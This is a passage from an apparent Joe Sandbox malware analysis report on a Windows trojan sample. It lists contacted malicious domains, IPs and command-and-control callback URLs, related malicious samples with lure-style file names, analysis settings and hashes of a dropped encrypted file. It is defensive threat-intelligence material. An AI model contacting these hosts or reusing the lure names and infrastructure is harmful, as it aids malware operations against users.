          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 52.15.160.167 | true | false | - | high
          montcoimmigrationlawyer.com | 184.168.131.241 | true | true | - | unknown
          missjeschickt.com | 81.169.145.72 | true | true | - | unknown
          www.przyczepy.net | 185.253.212.22 | true | true | - | unknown
          k9cdna.51w4.com | 45.142.156.44 | true | true | - | unknown
          www.swashbug.com | 169.1.24.244 | true | true | - | unknown
          mojilifenoosa.com | 184.168.131.241 | true | true | - | unknown
          zagorafinancial.com | 162.209.114.201 | true | true | - | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | - | unknown
          fibermover.com | 34.102.136.180 | true | false | - | unknown
          www.hispekdiamond.com | 213.171.195.105 | true | true | - | unknown
          www.plaisterpress.com | 104.21.24.135 | true | true | - | unknown
          www.borderlesstrade.info | unknown | unknown | true | - | unknown
          www.bl927.com | unknown | unknown | true | - | unknown
          www.montcoimmigrationlawyer.com | unknown | unknown | true | - | unknown
          www.mojilifenoosa.com | unknown | unknown | true | - | unknown
          www.missjeschickt.com | unknown | unknown | true | - | unknown
          www.3992199.com | unknown | unknown | true | - | unknown
          www.fibermover.com | unknown | unknown | true | - | unknown
          www.funnyfootballmugs.com | unknown | unknown | true | - | unknown
          www.7chd.com | unknown | unknown | true | - | unknown
          www.cdefenders.com | unknown | unknown | true | - | unknown
          www.zagorafinancial.com | unknown | unknown | true | - | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp | false | Avira URL Cloud: safe | unknown
          http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: malware | unknown
          http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          www.montcoimmigrationlawyer.com/uoe8/ | true | Avira URL Cloud: safe | low
          http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown
          http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Sources referenced in the table below:
          Source A = explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp
          Source B = rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmp

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | Source A | false | - | high
          http://www.fontbureau.com | Source A | false | - | high
          http://www.fontbureau.com/designersG | Source A | false | - | high
          https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt | Source B | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designers/? | Source A | false | - | high
          http://www.founder.com.cn/cn/bThe | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.fontbureau.com/designers? | Source A | false | - | high
          http://www.tiro.com | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.fontbureau.com/designers | Source A | false | - | high
          http://www.goodfont.co.kr | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.carterandcone.coml | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.sajatypeworks.com | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.typography.netD | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | Source A | false | - | high
          http://www.founder.com.cn/cn/cThe | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | Source A | false | URL Reputation: safe (x3) | unknown
          http://fontfabrik.com | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.founder.com.cn/cn | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.fontbureau.com/designers/frere-jones.html | Source A | false | - | high
          http://www.jiyu-kobo.co.jp/ | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.galapagosdesign.com/DPlease | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.fontbureau.com/designers8 | Source A | false | - | high
          http://www.fonts.com | Source A | false | - | high
          http://www.sandoll.co.kr | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.urwpp.deDPlease | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.zhongyicts.com.cn | Source A | false | URL Reputation: safe (x3) | unknown
          http://www.sakkal.com | Source A | false | URL Reputation: safe (x3) | unknown

          Contacted IPs


          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          45.142.156.44 | k9cdna.51w4.com | United Kingdom | 40065 | CNSERVERSUS | true
          23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
          184.168.131.241 | montcoimmigrationlawyer.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
          162.209.114.201 | zagorafinancial.com | United States | 27357 | RACKSPACEUS | true
          185.253.212.22 | www.przyczepy.net | Poland | 48707 | GREENER-ASPL | true
          81.169.145.72 | missjeschickt.com | Germany | 6724 | STRATOSTRATOAGDE | true
          34.102.136.180 | fibermover.com | United States | 15169 | GOOGLEUS | false
          169.1.24.244 | www.swashbug.com | South Africa | 37611 | AfrihostZA | true
          52.15.160.167 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
          213.171.195.105 | www.hispekdiamond.com | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | true

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version: 31.0.0 Emerald
          Analysis ID: 385309
          Start date: 12.04.2021
          Start time: 10:04:36
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 9m 39s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: NdBLyH2h5d.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed: 31
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@7/3@15/11
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 27.1% (good quality ratio 25%)
          • Quality average: 75.8%
          • Quality standard deviation: 30.3%
          HCA Information:
          • Successful, ratio: 92%
          • Number of executed functions: 88
          • Number of non-executed functions: 62
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 104.42.151.234, 40.88.32.150, 184.30.24.56, 20.82.210.154, 13.64.90.137, 8.241.79.126, 8.241.78.254, 8.241.83.126, 8.238.28.254, 8.241.89.126, 92.122.213.247, 92.122.213.194, 20.54.26.129, 104.43.193.48, 20.82.209.183, 172.67.212.56, 104.21.53.110
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.borderlesstrade.info.cdn.cloudflare.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
45.142.156.44 | jEXf5uQ3DE.exe | malicious | www.6927199.com/a6ru/?vRiX0=NhNiaHOKHVQfGN0YY99wJ58IE9WzqrmHm9WDer2yilaxrU8do+EbPhhYqdpc+7/sehz43PMCcQ==&OhNl7=9rXdXRPXHBu
45.142.156.44 | Purchase Order.xlsx | malicious | www.5915599.com/aqu2/?iL08e=Qu/SGATmsILkb3T/nQH1K+vXdQVupUmj3KZ2bTO1zlh5Ph/Ej23U53EZ4HzzSPUSLaFwlw==&2d2=XxlLiZV
45.142.156.44 | dot.dot | malicious | www.7985699.com/nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0
45.142.156.44 | SwiftMT103_pdf.exe | malicious | www.6927199.com/a6ru/?9rT=ablpdH&DvRxvP=NhNiaHOKHVQfGN0YY99wJ58IE9WzqrmHm9WDer2yilaxrU8do+EbPhhYqdlctrzvHxzu
45.142.156.44 | Scan-45679.exe | malicious | www.3931799.com/gwam/?Bjq=WBcASaJCttsXosCQsrWbmBSs+tmmydGShEGHgXg6pwkkYqVCVVlIvyOdwkU76G9CTRE5&Efzxz2=2dut_L3xNbOxThN
45.142.156.44 | Y79FTQtEqG.exe | malicious | www.5915599.com/aqu2/?8pdLW0th=Qu/SGATjsPLgbnfzlQH1K+vXdQVupUmj3KBmHQS03Fh4PQTCkmmYvz8b7ifPJvghEbQA&axo=tVBlCVNXaRgL
45.142.156.44 | MACHINE SPECIFICATION.exe | malicious | www.6987599.com/rrrq/?Qtu=0vETm3tpTz/JBz7myerFMJmtxuQinZwH/yTouEotDJa3Xdwt/k/0k/t75VQdQCQAjPnK&D8Lt7=AbilnzdhCdPTRfM
45.142.156.44 | shipping document008476_pdf.exe | malicious | www.5996399.com/xgxp/?Dxlpd=cJE0&Ybcx-VVp=Xu1DQjTJJhmglDyHbFvDt9q0tpf8gcpJJQnfBxbnS7whiZxllJdbVZRKcXEP+d7oIOuv
45.142.156.44 | Swift_Payment_jpeg.exe | malicious | www.3991799.com/09rb/?t8bL=mtOT66Wi3D6giMtbRcSTtfK33xC0G/9sULI8vKPJ3WYoXH3DAPX23CnZiOHbu4P1xNSn&2d=llsp
45.142.156.44 | IRS_Microsoft_Excel_Document_xls.jar | malicious | www.3991799.com/09rb/?Qzr=mtOT66Wi3D6giMtbRcSTtfK33xC0G/9sULI8vKPJ3WYoXH3DAPX23CnZiOHxxI/11Pan&uZUX=MXEXxL
23.227.38.74 | 4oItdZkNOZ.exe | malicious | www.recovatek.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw==
23.227.38.74 | PAYMENT COPY.exe | malicious | www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8
23.227.38.74 | Payment advice IN18663Q0031139I.xlsx | malicious | www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
23.227.38.74 | winlog.exe | malicious | www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
23.227.38.74 | 36ne6xnkop.exe | malicious | www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
23.227.38.74 | Pd0Tb0v0WW.exe | malicious | www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
23.227.38.74 | giATspz5dw.exe | malicious | www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
23.227.38.74 | IN18663Q0031139I.xlsx | malicious | www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
23.227.38.74 | HG546092227865431209.exe | malicious | www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
23.227.38.74 | Ref. PDF IGAPO17493.exe | malicious | www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
23.227.38.74 | pumYguna1i.exe | malicious | www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
23.227.38.74 | 0BAdCQQVtP.exe | malicious | www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
23.227.38.74 | TazxfJHRhq.exe | malicious | www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
23.227.38.74 | AQJEKNHnWK.exe | malicious | www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
23.227.38.74 | payment.exe | malicious | www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
23.227.38.74 | Order.exe | malicious | www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
23.227.38.74 | PO91361.exe | malicious | www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
23.227.38.74 | RFQ11_ZIM2021pdf.exe | malicious | www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
23.227.38.74 | 1517679127365.exe | malicious | www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
23.227.38.74 | W88AZXFGH.exe | malicious | www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==

Domains

Match | Associated Sample Name / URL | Detection | Context
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | g2qwgG2xbe.exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | winlog.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 1ucvVfbHnD.exe | malicious | 3.13.255.157
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Wire Transfer Update.exe | malicious | 3.13.255.157
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | LtfVNumoON.exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | giATspz5dw.exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Customer-100912288113.xlsx | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | New order.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | qRsvaKcvxZ.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | PO-RFQ # 097663899 pdf .exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | PO45937008ADENGY.exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Calt7BoW2a.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | TazxfJHRhq.exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 8sxgohtHjM.exe | malicious | 3.13.255.157
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | vbc.exe | malicious | 3.13.255.157
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Order Inquiry.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | PaymentAdvice.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | BL01345678053567.exe | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Shipping Documents.xlsx | malicious | 3.14.206.30
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | TACA20210407.PDF.exe | malicious | 3.13.255.157
k9cdna.51w4.com | jEXf5uQ3DE.exe | malicious | 45.142.156.44
k9cdna.51w4.com | Purchase Order.xlsx | malicious | 45.142.156.44
k9cdna.51w4.com | dot.dot | malicious | 45.142.156.44
k9cdna.51w4.com | SwiftMT103_pdf.exe | malicious | 45.142.156.44
k9cdna.51w4.com | Scan-45679.exe | malicious | 45.142.156.44
k9cdna.51w4.com | Y79FTQtEqG.exe | malicious | 45.142.156.44
k9cdna.51w4.com | MACHINE SPECIFICATION.exe | malicious | 45.142.156.44
k9cdna.51w4.com | shipping document008476_pdf.exe | malicious | 45.142.156.44
k9cdna.51w4.com | Swift_Payment_jpeg.exe | malicious | 45.142.156.44
k9cdna.51w4.com | IRS_Microsoft_Excel_Document_xls.jar | malicious | 45.142.156.44
k9cdna.51w4.com | uM0FDMSqE2.exe | malicious | 45.142.156.43
k9cdna.51w4.com | #U043e#U0444#U0435#U0440#U0442#U0430 #U0437#U0430 #U043f#U043e#U0440#U044a#U0447#U043a#U0430.exe | malicious | 45.142.156.48
k9cdna.51w4.com | HussanCrypted.exe | malicious | 45.142.156.48
k9cdna.51w4.com | Mediform S.A Order Specification Requirement.xls.exe | malicious | 45.142.156.48
k9cdna.51w4.com | Mediform Order Specification Requirement.xls.exe | malicious | 45.142.156.48

ASN

Match | Associated Sample Name / URL | Detection | Context
AS-26496-GO-DADDY-COM-LLCUS | 4oItdZkNOZ.exe | malicious | 107.180.50.167
AS-26496-GO-DADDY-COM-LLCUS | Portfolio.exe | malicious | 72.167.241.46
AS-26496-GO-DADDY-COM-LLCUS | 12042021493876783,xlsx.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | CIVIP-8287377.exe | malicious | 184.168.177.1
AS-26496-GO-DADDY-COM-LLCUS | MT103_004758.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | Payment advice IN18663Q0031139I.xlsx | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | Swift002.exe | malicious | 50.62.160.230
AS-26496-GO-DADDY-COM-LLCUS | 36ne6xnkop.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | 56UDmImzPe.dll | malicious | 107.180.90.10
AS-26496-GO-DADDY-COM-LLCUS | Shipping doc&_B-Landen.exe | malicious | 50.62.137.41
AS-26496-GO-DADDY-COM-LLCUS | Statement-ID261179932209970.vbs | malicious | 148.72.208.50
AS-26496-GO-DADDY-COM-LLCUS | _.ryder.com._1602499153.666014.dll | malicious | 166.62.30.150
AS-26496-GO-DADDY-COM-LLCUS | mW07jhVxX5.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | jEXf5uQ3DE.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | giATspz5dw.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | cV1uaQeOGg.exe | malicious | 107.180.50.167
AS-26496-GO-DADDY-COM-LLCUS | documents-351331057.xlsm | malicious | 173.201.252.173
AS-26496-GO-DADDY-COM-LLCUS | documents-351331057.xlsm | malicious | 173.201.252.173
AS-26496-GO-DADDY-COM-LLCUS | documents-1819557117.xlsm | malicious | 173.201.252.173
AS-26496-GO-DADDY-COM-LLCUS | documents-1819557117.xlsm | malicious | 173.201.252.173
CNSERVERSUS | PAYMENT COPY.exe | malicious | 23.225.41.92
CNSERVERSUS | Swift002.exe | malicious | 23.225.197.29
CNSERVERSUS | jEXf5uQ3DE.exe | malicious | 45.142.156.44
CNSERVERSUS | Purchase Order.xlsx | malicious | 45.142.156.44
CNSERVERSUS | Statement Of account.exe | malicious | 45.205.60.183
CNSERVERSUS | dot.dot | malicious | 45.142.156.44
CNSERVERSUS | NEW ORDER - BLL04658464.exe | malicious | 154.198.253.11
CNSERVERSUS | New Order.exe | malicious | 23.225.41.18
CNSERVERSUS | BL836477488575.exe | malicious | 172.247.179.61
CNSERVERSUS | B of L - way bill return.exe | malicious | 154.198.253.11
CNSERVERSUS | SwiftMT103_pdf.exe | malicious | 45.142.156.44
CNSERVERSUS | Request an Estimate_2021_04_01.exe | malicious | 154.198.196.146
CNSERVERSUS | xpy9BhQR3t.xlsx | malicious | 192.161.85.138
CNSERVERSUS | Scan-45679.exe | malicious | 23.225.141.130
CNSERVERSUS | BIOTECHPO960488580.exe | malicious | 172.247.179.61
CNSERVERSUS | Y79FTQtEqG.exe | malicious | 45.142.156.44
CNSERVERSUS | IMG001.exe | malicious | 23.225.141.130
CNSERVERSUS | Po # 6-10331.exe | malicious | 154.88.22.37
CNSERVERSUS | MACHINE SPECIFICATION.exe | malicious | 45.142.156.44
CNSERVERSUS | Invoice #0023228 PDF.exe | malicious | 154.91.159.195
CLOUDFLARENETUS | 4oItdZkNOZ.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | ieuHgdpuPo.exe | malicious | 104.21.17.57
CLOUDFLARENETUS | Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exe | malicious | 172.67.222.176
CLOUDFLARENETUS | Payment Slip.doc | malicious | 104.21.17.57
CLOUDFLARENETUS | Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exe | malicious | 104.21.17.57
CLOUDFLARENETUS | INQUIRY 1820521 pdf.exe | malicious | 104.21.82.58
CLOUDFLARENETUS | PaymentCopy.vbs | malicious | 172.67.222.131
CLOUDFLARENETUS | PAYMENT COPY.exe | malicious | 104.21.28.135
CLOUDFLARENETUS | PO NUMBER 3120386 3120393 SIGNED.exe | malicious | 1.2.3.4
CLOUDFLARENETUS | Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe | malicious | 172.67.222.176
CLOUDFLARENETUS | BL2659618800638119374.xls.exe | malicious | 172.67.222.176
CLOUDFLARENETUS | Purchase order and quote confirmation.exe | malicious | 172.67.222.176
CLOUDFLARENETUS | Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | Re Confirm#U00ffthe invoice#U00ffthe payment slip.exe | malicious | 104.21.17.57
CLOUDFLARENETUS | SOA.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | RFQ No A'4762GHTECHNICAL DETAILS.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | GQ5JvPEI6c.exe | malicious | 104.21.17.57
CLOUDFLARENETUS | setupapp.exe | malicious | 172.67.164.1
CLOUDFLARENETUS | g2qwgG2xbe.exe | malicious | 172.67.161.4
CLOUDFLARENETUS | C++ Dropper.exe | malicious | 104.21.50.92

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\kujd8v16w3b9lgr
                                                                            Process: C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type: data
                                                                            Category: dropped
                                                                            Size (bytes): 164864
                                                                            Entropy (8bit): 7.998914918090413
                                                                            Encrypted: true
                                                                            SSDEEP: 3072:mtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorABqGMWt9:medJjkvxKvMCA0TirvGL
                                                                            MD5: E83FC0EE2B9E83A097B116CB29EF1959
                                                                            SHA1: 89B3F8182EC630FE17642466E446D39CE6BE5315
                                                                            SHA-256: 0049A5567B1B77E56ED32450A5531B2DC76B852CE760BA10ADA60CE9E71375A0
                                                                            SHA-512: EE14F870316B77B8D6FBF8366171B11B39B08B34F4703C6240C90E08956C56AD8C80CB09C3D1832F965C5445AA4F0E30652FF312610EEBF7DC3B881EC512FD6C
                                                                            Malicious: false
                                                                            Reputation: low
                                                                            Note: the SSDEEP chunk sequence mtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorA also occurs inside the submitted file's SSDEEP (see Static File Info below), so this blob is content carried in the NSIS archive and written out, not data generated at run time.
